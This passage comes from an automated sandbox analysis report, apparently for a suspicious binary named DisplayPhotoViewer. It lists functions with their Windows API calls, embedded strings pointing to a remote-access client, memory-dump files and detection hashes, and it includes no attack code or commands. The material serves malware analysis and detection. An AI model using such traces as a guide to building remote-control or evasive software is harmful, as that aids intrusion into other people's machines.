                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003273
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 11003297
                                                                                                    • DestroyMenu.USER32(00000000), ref: 110032A9
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                    • API String ID: 4241058051-934300333
                                                                                                    • Opcode ID: 732675da0ea725811b98be71d747fcb95b0e444bca69133be625d6e3c1676045
                                                                                                    • Instruction ID: d38dec85234622729874ab4cd2c6c3ea96c2fd682ffa7c7270df6d9eb230201a
                                                                                                    • Opcode Fuzzy Hash: 732675da0ea725811b98be71d747fcb95b0e444bca69133be625d6e3c1676045
                                                                                                    • Instruction Fuzzy Hash: 9DF0E23AE4492BB3C21366B57C09F8FF7948BD16A9F058071F805B6285FA20A40147E2
                                                                                                    Function 11111540 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,00000000), ref: 111115E0
                                                                                                    • ClientToScreen.USER32(?,?), ref: 11111621
                                                                                                    • GetCursorPos.USER32(?), ref: 11111681
                                                                                                    • GetTickCount.KERNEL32 ref: 11111696
                                                                                                    • GetTickCount.KERNEL32 ref: 11111717
                                                                                                    • WindowFromPoint.USER32(?,?,?,?), ref: 1111177A
                                                                                                    • WindowFromPoint.USER32(000000FF,?), ref: 1111178E
                                                                                                    • SetCursorPos.USER32(000000FF,?,?,?), ref: 111117A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4245181967-0
                                                                                                    • Opcode ID: 751151877e6243d71f276c6990353a8e2fa76892cbe4ca5bda40f7253cc5a873
                                                                                                    • Instruction ID: b1aeac07f537f15df3632607b10d074be41c567298c399fbf07d13beffdd9b8d
                                                                                                    • Opcode Fuzzy Hash: 751151877e6243d71f276c6990353a8e2fa76892cbe4ca5bda40f7253cc5a873
                                                                                                    • Instruction Fuzzy Hash: 71912475A00A0A8FDB14DFB4D584AAEF7F5FF89314F50492ED86A97344DB31A841CB60
                                                                                                    Function 10709938 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,10705C78), ref: 10709953
                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,10705C78), ref: 10709967
                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,10705C78), ref: 10709993
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,10705C78), ref: 107099CB
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10705C78), ref: 107099ED
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10705C78), ref: 10709A06
                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,10705C78), ref: 10709A19
                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10709A57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1823725401-0
                                                                                                    • Opcode ID: 04a06433da7a5661d946a9a2d22f7ddeb087997fdd988d480bf9e0d9fe1ca1a6
                                                                                                    • Instruction ID: bf087d2da379b3c7f6bd605822513a37b1d74adc97f5a37825ed499f1e937abf
                                                                                                    • Opcode Fuzzy Hash: 04a06433da7a5661d946a9a2d22f7ddeb087997fdd988d480bf9e0d9fe1ca1a6
                                                                                                    • Instruction Fuzzy Hash: C93138F27042A66FD3517F788CC882FB7DCE68B294B12872DF591D3108EA715C40C2A5
                                                                                                    Function 1070C47B Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 241fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,10712291,00000000,00000000), ref: 1070C62E
                                                                                                    • GetLastError.KERNEL32 ref: 1070C63A
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 1070C64F
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1070C65A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastType
                                                                                                    • String ID: @$H
                                                                                                    • API String ID: 1809617866-104103126
                                                                                                    • Opcode ID: e1ed8818d3adc5aaa63c3ae9355367687b34f2b145ab26f15e5b16f31ec09376
                                                                                                    • Instruction ID: 5b054b87e5be8c5b0413974341830de54ee908ff4ec83318dcfc05465d114a8b
                                                                                                    • Opcode Fuzzy Hash: e1ed8818d3adc5aaa63c3ae9355367687b34f2b145ab26f15e5b16f31ec09376
                                                                                                    • Instruction Fuzzy Hash: F28143B5D0438D9BEB108FA4CC857AE7BE0EF073A4F254319F851AB1D8C7B5AA448B51
                                                                                                    Function 110534A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(111E12A8,218EC38C,1110715D,00000000,00000000,00000000,E8111A9F,11177AA3,000000FF,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000), ref: 110718DE
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(0000000C,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 11071947
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(00000024,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 1107194D
                                                                                                      • Part of subcall function 11071890: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 11071957
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(000004C8,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719AC
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(000004F0,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719B5
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105368C
                                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110536D1
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110536E4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110536EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                    • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                                    • API String ID: 3780373956-3165951319
                                                                                                    • Opcode ID: 2c237f1e948e84f5e5a63c17618d3a706f102ce51b54fd57485bcffacc3d8260
                                                                                                    • Instruction ID: da12c567308467bc0e476183fe291f3eb547be533663a98a39922bd85968d243
                                                                                                    • Opcode Fuzzy Hash: 2c237f1e948e84f5e5a63c17618d3a706f102ce51b54fd57485bcffacc3d8260
                                                                                                    • Instruction Fuzzy Hash: 0C713CB4A01614AFD751CFAAC8C0E9AFBF9FF88314F10859AE9559B315C770A940CF64
                                                                                                    Function 11069860 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,?,75BF7CB0,75BF7AA0), ref: 110698C5
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,11067950,?,?), ref: 110699A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEventSection
                                                                                                    • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                    • API String ID: 2291802058-2624497655
                                                                                                    • Opcode ID: 2c73080b8ae187453734e022d3194a06985a24616148979f2fe0d8bb3209aada
                                                                                                    • Instruction ID: be5c7bb0868500cb87f8536a09ee6ec79e22c9f8714405e13c9200cbeae849c4
                                                                                                    • Opcode Fuzzy Hash: 2c73080b8ae187453734e022d3194a06985a24616148979f2fe0d8bb3209aada
                                                                                                    • Instruction Fuzzy Hash: 2F71CF74E042869FEB15CF68C484FDDBBF9BB05314F0481D9D41A9B692E770E985CBA0
                                                                                                    Function 1101D9B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 1101DA21
                                                                                                      • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101DB35
                                                                                                    • GetSaveFileNameA.COMDLG32(?), ref: 1101DB57
                                                                                                    • _fputs.LIBCMT ref: 1101DB83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                    • String ID: ChatPath$X
                                                                                                    • API String ID: 2661292734-3955712077
                                                                                                    • Opcode ID: d3167b079e66406386662c12e0c41d9d19578075924410e3e495f44888715057
                                                                                                    • Instruction ID: 9e82242c7d8996982157ac8d56a6da1272a34e48fed0dc1194ded13fdbc69b67
                                                                                                    • Opcode Fuzzy Hash: d3167b079e66406386662c12e0c41d9d19578075924410e3e495f44888715057
                                                                                                    • Instruction Fuzzy Hash: 5D51B375D043599FDB21EB60CD88B9EBBB4BF45308F4041D9D9096B280EB75EA44CB90
                                                                                                    Function 11045504 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Closewsprintf
                                                                                                    • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                                    • API String ID: 4060989581-4096285074
                                                                                                    • Opcode ID: 9b754497ad4494505d3cb7def387756ac7962f554211c21d3bb8d9205f62b3f6
                                                                                                    • Instruction ID: ef38fbc228f2a11926dd6cf6f0fea03773ab9401bb016fa2deec54abac17f136
                                                                                                    • Opcode Fuzzy Hash: 9b754497ad4494505d3cb7def387756ac7962f554211c21d3bb8d9205f62b3f6
                                                                                                    • Instruction Fuzzy Hash: 70414BB1E005199BCB15CF64DCD1BEEB3B5AF49304F1045E8EA1997680EB32AE84CF95
                                                                                                    Function 11045539 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Closewsprintf
                                                                                                    • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                                    • API String ID: 4060989581-4096285074
                                                                                                    • Opcode ID: dc631255adf3c089bb2cd2c4de9372626490230deb98f22d80feedb5db77dd48
                                                                                                    • Instruction ID: 4fc9967668331477116f347ba3c21676c3638bd457e48876168c634851661cef
                                                                                                    • Opcode Fuzzy Hash: dc631255adf3c089bb2cd2c4de9372626490230deb98f22d80feedb5db77dd48
                                                                                                    • Instruction Fuzzy Hash: 43412BB1E002199BCB15CF64DCD1BEEB3B5AF49304F1041E8EA1997640EB32AE84CF55
                                                                                                    Function 110FF670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,1117ECB6,000000FF), ref: 110FF743
                                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FF78C
                                                                                                    • std::exception::exception.LIBCMT ref: 110FF7EE
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110FF803
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                    • API String ID: 2851125068-2390547818
                                                                                                    • Opcode ID: cb8e67688c38ac2871a8d10db1fe04191b0601a259bd1c73357765a7ea03064f
                                                                                                    • Instruction ID: 294511d2743a5f9b06d3c33d4191c482935c74709cac97a834179c0086ff3fe7
                                                                                                    • Opcode Fuzzy Hash: cb8e67688c38ac2871a8d10db1fe04191b0601a259bd1c73357765a7ea03064f
                                                                                                    • Instruction Fuzzy Hash: 7041F1B5C09B449ED761CF6AC980BDAFBE8EFA5604F00491ED5AE93210DB787600CF61
                                                                                                    Function 1100F950 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F966
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CA5
                                                                                                      • Part of subcall function 11155C90: __CxxThrowException@8.LIBCMT ref: 11155CBA
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CCB
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F97C
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F997
                                                                                                    • _memmove.LIBCMT ref: 1100FA02
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
